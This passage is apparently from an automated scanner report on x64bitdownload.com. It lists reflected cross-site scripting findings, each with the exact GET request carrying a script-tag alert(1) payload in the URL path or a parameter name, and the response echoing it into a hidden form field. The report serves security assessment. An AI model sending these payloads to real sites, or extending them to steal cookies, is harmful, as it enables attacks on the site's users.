HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:45:21 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:55:30 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 92581
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-multimedia-downloads.htmld6969"><script>alert(1)</script>002478f819e" /> ...[SNIP]...
1.65. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-multimedia-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b14b"><script>alert(1)</script>9323ad41c03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-multimedia-downloads.html?4b14b"><script>alert(1)</script>9323ad41c03=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:42:07 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:52:30 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 92584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-multimedia-downloads.html?4b14b"><script>alert(1)</script>9323ad41c03=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fada"><script>alert(1)</script>70bed0cb402 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-multipart-downloads.html4fada"><script>alert(1)</script>70bed0cb402 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:43:26 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:53:30 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 73557
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-multipart-downloads.html4fada"><script>alert(1)</script>70bed0cb402" /> ...[SNIP]...
1.67. http://www.x64bitdownload.com/64-bit-multipart-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-multipart-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8218"><script>alert(1)</script>80184a44002 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-multipart-downloads.html?c8218"><script>alert(1)</script>80184a44002=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:40:55 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:51:08 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 73560
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-multipart-downloads.html?c8218"><script>alert(1)</script>80184a44002=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ec5"><script>alert(1)</script>f58c4ad49c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-news-c-44-newsgroup-clients-downloads.htmlb0ec5"><script>alert(1)</script>f58c4ad49c2 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:40:26 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:50:47 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 42660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-news-c-44-newsgroup-clients-downloads.htmlb0ec5"><script>alert(1)</script>f58c4ad49c2" /> ...[SNIP]...
1.69. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6397"><script>alert(1)</script>35e6393fe11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-news-c-44-newsgroup-clients-downloads.html?d6397"><script>alert(1)</script>35e6393fe11=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:36:00 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:46:09 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 42663
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-news-c-44-newsgroup-clients-downloads.html?d6397"><script>alert(1)</script>35e6393fe11=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 621e6"><script>alert(1)</script>f97e27d071e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-news-downloads.html621e6"><script>alert(1)</script>f97e27d071e HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:40:49 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:51:01 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 87022
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-news-downloads.html621e6"><script>alert(1)</script>f97e27d071e" /> ...[SNIP]...
1.71. http://www.x64bitdownload.com/64-bit-news-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-news-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84391"><script>alert(1)</script>fc16f13d74f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-news-downloads.html?84391"><script>alert(1)</script>fc16f13d74f=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:37:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:47:15 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 87025
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-news-downloads.html?84391"><script>alert(1)</script>fc16f13d74f=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea20"><script>alert(1)</script>0c390275c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-news-reader-downloads.htmlaea20"><script>alert(1)</script>0c390275c86 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:55:56 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:06:04 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94458
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-news-reader-downloads.htmlaea20"><script>alert(1)</script>0c390275c86" /> ...[SNIP]...
1.73. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-news-reader-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db679"><script>alert(1)</script>d820eccf371 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-news-reader-downloads.html?db679"><script>alert(1)</script>d820eccf371=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:52:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:02:18 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-news-reader-downloads.html?db679"><script>alert(1)</script>d820eccf371=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4bcf"><script>alert(1)</script>e2a44662479 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-newsfeed-downloads.htmle4bcf"><script>alert(1)</script>e2a44662479 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:54:08 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:04:10 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 37242
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-newsfeed-downloads.htmle4bcf"><script>alert(1)</script>e2a44662479" /> ...[SNIP]...
1.75. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-newsfeed-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2049a"><script>alert(1)</script>3be85d0325f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-newsfeed-downloads.html?2049a"><script>alert(1)</script>3be85d0325f=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:49:57 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:00:12 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 37245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-newsfeed-downloads.html?2049a"><script>alert(1)</script>3be85d0325f=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0f0"><script>alert(1)</script>db92b86c3df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-newsgroup-c-44-newsgroup-clients-downloads.htmldc0f0"><script>alert(1)</script>db92b86c3df HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:38:37 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:49:05 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 36496
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-newsgroup-c-44-newsgroup-clients-downloads.htmldc0f0"><script>alert(1)</script>db92b86c3df" /> ...[SNIP]...
1.77. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2749"><script>alert(1)</script>451987c9093 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html?b2749"><script>alert(1)</script>451987c9093=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:35:23 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:45:44 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 36499
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html?b2749"><script>alert(1)</script>451987c9093=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 822b0"><script>alert(1)</script>c828d960a93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-newsgroup-downloads.html822b0"><script>alert(1)</script>c828d960a93 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:52:00 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:02:05 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76134
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-newsgroup-downloads.html822b0"><script>alert(1)</script>c828d960a93" /> ...[SNIP]...
1.79. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-newsgroup-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18e37"><script>alert(1)</script>5191ca0d343 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-newsgroup-downloads.html?18e37"><script>alert(1)</script>5191ca0d343=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:48:28 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:58:42 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-newsgroup-downloads.html?18e37"><script>alert(1)</script>5191ca0d343=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 568b0"><script>alert(1)</script>8a53e952c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html568b0"><script>alert(1)</script>8a53e952c4 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
